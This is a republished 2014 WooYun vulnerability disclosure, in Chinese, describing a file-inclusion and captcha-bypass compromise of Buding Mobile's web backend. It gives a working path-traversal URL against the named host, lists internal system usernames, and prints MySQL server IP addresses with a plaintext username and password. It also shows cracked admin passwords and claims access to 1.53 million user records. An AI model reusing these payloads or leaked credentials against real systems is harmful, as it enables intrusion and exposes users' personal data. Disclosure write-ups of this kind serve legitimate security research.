布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

admin
admin
admin
139803
文章
114
评论
2015年8月11日14:56:34评论318 views字数 228阅读0分45秒阅读模式
摘要

2014-11-16: 细节已通知厂商并且等待厂商处理中
2014-11-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-11-21: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2014-83516

漏洞标题: 布丁移动任意文件包含|验证码绕过(可获取153万用户密码,已入后台)

相关厂商: 创新工场

漏洞作者: lijiejie布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

提交时间: 2014-11-16 20:44

公开时间: 2014-11-21 20:46

漏洞类型: 文件包含

危害等级: 高

自评Rank: 16

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

6人收藏

漏洞详情

披露状态:

2014-11-16: 细节已通知厂商并且等待厂商处理中
2014-11-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-11-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

布丁移动一处任意文件包含,验证码可绕过。已进入后台。
可远程连接MySQL(成功4台),泄漏带密文MD5 Hash的用户数据153万。
有手机号,密码,IMEI,MAC等信息。

详细说明:

任意文件包含位于:

code 区域 
http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../../etc/passwd%00.jpg

非root,无法读shadow。首先尝试收集用户名,找到:

code 区域 
root
 oper
 transfer
 luozhaobo
 luoxian
 lixiaofeng
 renfei
 wangchunpeng
 yangyu
 jll
 baojuqiang
 yuchen
 hezheng
 chenbingyu
 munin
 zhouwei
 databackup
 git
 ejbca
 gaolei
 wangdong
 hekunming
 wangjun
 martin

作为基本思路,收集了用户名列表就可以去破解邮箱了。

因为非root权限,而且是“文件包含”漏洞,所以读php文件中的配置是存在一些困难的。

我逐个用户测试能否读.bash_history文件。功夫不负有心人呐,找到了有权限的用户:

code 区域 
http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../..//home/yangyu/.bash_history%00.jpg

该文件记录了大量敏感信息,运维人员安全意识还不够。。。

漏洞证明:

MySQL数据库:

code 区域 
host = '58.68.234.22', user = 'yangyu', passwd = 'netjava', db = 'martin', charset = 'utf8'
 host = '118.192.93.138', port = 3308, db = 'martin',user = 'yangyu', passwd = 'netjava', charset = 'utf8'    可远程连接
 host = '223.202.2.206',user = 'yangyu', passwd = 'netjava', db = 'vcar_sumrise', charset = 'utf8'    可远程连接
 ssh -p11528     可远程连接
 58.68.234.20  可远程连接

通用密码。。。 连接成功了4台MySQL Server。

布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

153万用户,有密文:

布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

应该是公司所有的人吧:

布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

123456,发现无法登录cms这个后台。基本确定有salt。

然而,后台验证码可绕过进行暴力破解(一次校验后不过期)。

破解出来几枚:

code 区域 
 000000
  000000
  yangyang
  wangjing
  wangdong

超级管理员:

布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

后台功能未一一测试了。 ssh也未暴力破解。

后续深入渗透是个体力活,就到这里吧。 布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

修复方案:

1. 参数过滤,解决任意文件包含

2. 验证码使用一次之后必须过期

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-21 20:46

厂商回复:

最新状态:

2014-11-21:真的很抱歉,没有为作者评级上。漏洞已经转交给布丁项目的同学。 危害等级是高,哎,真的对不住这位同学,我已经准备去HR领表了,希望得到你的原谅。。。

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-21 20:49 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    1

    无影响666666

  2. 2014-11-21 21:41 | lijiejie 布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台) ( 核心白帽子 | Rank:2527 漏洞数:325 | Just for fun.)

    2

    @创新工场 无需太自责,及时处理了漏洞就好。 我了解到的情况是wooyun有短信通知,估计你们填写的号码失效了,所以没收到短信。 Mail的话,如果是公共邮箱,不转发到个人邮件,没看到也属正常。 布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台)

  3. 2014-11-21 21:52 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @lijiejie 弱弱问下,这个是布丁的app引起的还是web?厂商貌似把服务关了啊.....

  4. 2014-11-22 12:12 | lijiejie 布丁移动任意文件包含验证码绕过(可获取153万用户密码,已入后台) ( 核心白帽子 | Rank:2527 漏洞数:325 | Just for fun.)

    2

    @g0odnight 既然已经通知到了那肯定得先关了,处理修复后再上线。 这个是web的

  5. 2014-11-22 23:07 | 狮子找女友 ( 路人 | Rank:8 漏洞数:3 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    1

    netjava是怎么知道的呢

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin